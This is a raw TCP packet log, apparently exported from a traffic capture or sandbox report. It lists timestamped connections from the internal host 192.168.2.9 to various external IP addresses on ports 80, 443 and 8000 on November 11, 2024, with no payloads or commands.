                                                                                                                                                                                                            Nov 11, 2024 18:07:40.073628902 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.073640108 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.073657990 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.073684931 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.074362993 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.074423075 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.074434042 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.074445963 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.074472904 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.074491978 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.076045036 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.076071024 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.076097965 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.076117039 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.152503014 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.152523041 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.152600050 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.393816948 CET8056884154.212.231.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.393903017 CET5688480192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399235010 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399285078 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399302959 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399338961 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399343014 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399398088 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399434090 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399447918 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399451971 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399485111 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399487972 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399529934 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399588108 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399590969 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399640083 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399971008 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.400016069 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.400019884 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.400053024 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.400867939 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.400906086 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.400914907 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.400950909 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.410044909 CET5688480192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.413921118 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.415086985 CET8056884154.212.231.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.419198990 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.532752037 CET805688885.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.532825947 CET5688880192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.532901049 CET5688880192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.537852049 CET805688885.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.747898102 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.748013973 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.748049974 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.748111010 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.754924059 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.754966974 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.755052090 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.756606102 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.756616116 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.766338110 CET8056884154.212.231.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.766397953 CET5688480192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.185524940 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.185657978 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.187484026 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.187500000 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.187829971 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.187946081 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.188251972 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.231332064 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957185030 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957228899 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957254887 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957284927 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957309008 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957309961 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957334995 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957353115 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957353115 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957361937 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957400084 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957458019 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957458019 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957463980 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957588911 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.977129936 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.977184057 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.977343082 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.977359056 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.977543116 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.040577888 CET5690580192.168.2.913.248.169.48
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.045425892 CET805690513.248.169.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.045480013 CET5690580192.168.2.913.248.169.48
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.060307980 CET5690580192.168.2.913.248.169.48
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.065283060 CET805690513.248.169.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.480381012 CET805690513.248.169.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.480433941 CET5690580192.168.2.913.248.169.48
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.540710926 CET5691180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.545840979 CET8056911188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.545909882 CET5691180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.547264099 CET5691180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.552128077 CET8056911188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.657013893 CET5691280192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.663484097 CET80569123.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.663553953 CET5691280192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.663829088 CET5691280192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.665271997 CET5691380192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.669891119 CET80569123.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.670196056 CET805691318.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.670259953 CET5691380192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.673729897 CET5691380192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.678560972 CET805691318.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.710855961 CET5691580192.168.2.9103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.715920925 CET8056915103.150.10.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.715996027 CET5691580192.168.2.9103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.723053932 CET5691580192.168.2.9103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.727875948 CET8056915103.150.10.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.092955112 CET80569123.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.094747066 CET5691280192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.095549107 CET5691280192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.096957922 CET805691318.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.097028971 CET5691380192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.099117041 CET5691380192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.100620031 CET80569123.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.100723028 CET5691280192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.103707075 CET805691318.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.103883982 CET5691380192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.103924990 CET805691318.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.319098949 CET8056911188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.319134951 CET8056911188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.319222927 CET5691180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.319307089 CET5691180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.346363068 CET56920443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.346385956 CET44356920188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.346541882 CET56920443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.346694946 CET56920443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.346709013 CET44356920188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.506666899 CET8056915103.150.10.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.506855011 CET5691580192.168.2.9103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.513645887 CET569238000192.168.2.9106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.518466949 CET800056923106.15.232.163192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.518583059 CET569238000192.168.2.9106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.518893003 CET569238000192.168.2.9106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.523849010 CET800056923106.15.232.163192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.093020916 CET44356920188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.093118906 CET56920443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.103234053 CET56920443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.103241920 CET44356920188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.103544950 CET44356920188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.103606939 CET56920443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.104011059 CET56920443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.151328087 CET44356920188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.297677040 CET800056923106.15.232.163192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.297745943 CET569238000192.168.2.9106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.298877001 CET5691580192.168.2.9103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.303997993 CET8056915103.150.10.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.573286057 CET8056915103.150.10.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.573348999 CET5691580192.168.2.9103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.574848890 CET569238000192.168.2.9106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.580178976 CET800056923106.15.232.163192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.866720915 CET800056923106.15.232.163192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.866848946 CET569238000192.168.2.9106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.418967962 CET44356920188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.419029951 CET44356920188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.419074059 CET44356920188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.419092894 CET56920443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.419106007 CET44356920188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.419121027 CET44356920188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.419156075 CET56920443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.419174910 CET56920443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.419186115 CET44356920188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.419226885 CET56920443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.419233084 CET44356920188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.419244051 CET44356920188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.419275045 CET56920443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.420236111 CET44356920188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.420294046 CET56920443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.420306921 CET56920443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.420344114 CET56920443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.421735048 CET5691180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.426505089 CET8056911188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.827609062 CET8056911188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.827713966 CET5691180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.837353945 CET56942443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.837419987 CET44356942188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.837482929 CET56942443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.837754011 CET56942443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.837771893 CET44356942188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:46.265345097 CET44356942188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:46.265424967 CET56942443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:46.267193079 CET56942443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:46.267204046 CET44356942188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:46.267549038 CET44356942188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:46.267642975 CET56942443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:46.267987013 CET56942443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:46.315326929 CET44356942188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.727152109 CET44356942188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.727217913 CET56942443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.727231026 CET44356942188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.727304935 CET56942443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.727875948 CET56942443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.727988958 CET44356942188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.728053093 CET56942443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.900141001 CET5696080192.168.2.976.223.67.189
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.904895067 CET805696076.223.67.189192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.904954910 CET5696080192.168.2.976.223.67.189
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.905108929 CET5696080192.168.2.976.223.67.189
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.910288095 CET805696076.223.67.189192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.964752913 CET5696180192.168.2.964.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.969768047 CET805696164.225.91.73192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.969908953 CET5696180192.168.2.964.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.970525980 CET5696180192.168.2.964.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.975451946 CET805696164.225.91.73192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.083817959 CET5696480192.168.2.9103.224.212.210
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.088728905 CET8056964103.224.212.210192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.088781118 CET5696480192.168.2.9103.224.212.210
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.088905096 CET5696480192.168.2.9103.224.212.210
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.093770981 CET8056964103.224.212.210192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.110228062 CET5696580192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.115014076 CET805696544.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.115076065 CET5696580192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.115242004 CET5696580192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.120068073 CET805696544.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.186849117 CET5696680192.168.2.9154.85.183.50
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.191652060 CET8056966154.85.183.50192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.191761017 CET5696680192.168.2.9154.85.183.50
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.191951990 CET5696680192.168.2.9154.85.183.50
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.196787119 CET8056966154.85.183.50192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.230165958 CET5696780192.168.2.9103.224.182.252
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.236639023 CET8056967103.224.182.252192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.236713886 CET5696780192.168.2.9103.224.182.252
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.236875057 CET5696780192.168.2.9103.224.182.252
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.241686106 CET8056967103.224.182.252192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.335303068 CET805696076.223.67.189192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.335359097 CET5696080192.168.2.976.223.67.189
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.525259018 CET805696164.225.91.73192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.528189898 CET5696180192.168.2.964.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.542262077 CET805696544.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.544332981 CET5696580192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.549642086 CET805696544.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.551914930 CET5696580192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.649300098 CET8056964103.224.212.210192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.649502039 CET5696480192.168.2.9103.224.212.210
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.731123924 CET8056964103.224.212.210192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.731177092 CET5696480192.168.2.9103.224.212.210
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.799997091 CET8056967103.224.182.252192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.800072908 CET5696780192.168.2.9103.224.182.252
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.863894939 CET8056967103.224.182.252192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.865145922 CET5696780192.168.2.9103.224.182.252
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.914921045 CET8056874199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.917268038 CET5687480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.011537075 CET8056966154.85.183.50192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.011612892 CET5696680192.168.2.9154.85.183.50
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.099286079 CET5696580192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.103461981 CET5696480192.168.2.9103.224.212.210
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.104259968 CET805696544.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.105601072 CET5696680192.168.2.9154.85.183.50
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.105906010 CET5696780192.168.2.9103.224.182.252
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.109339952 CET8056964103.224.212.210192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.111805916 CET8056966154.85.183.50192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.111818075 CET8056967103.224.182.252192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.390928030 CET8056966154.85.183.50192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.390994072 CET5696680192.168.2.9154.85.183.50
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.428781986 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.433681011 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.433744907 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.433974028 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.439002037 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.443607092 CET5697780192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.449345112 CET8056977199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.449448109 CET5697780192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.449634075 CET5697780192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.454659939 CET8056977199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.896653891 CET8056977199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.896755934 CET5697780192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.896775961 CET8056977199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.896811008 CET5697780192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115219116 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115287066 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115292072 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115305901 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115324020 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115331888 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115335941 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115348101 CET805697664.190.63.136192.168.2.9
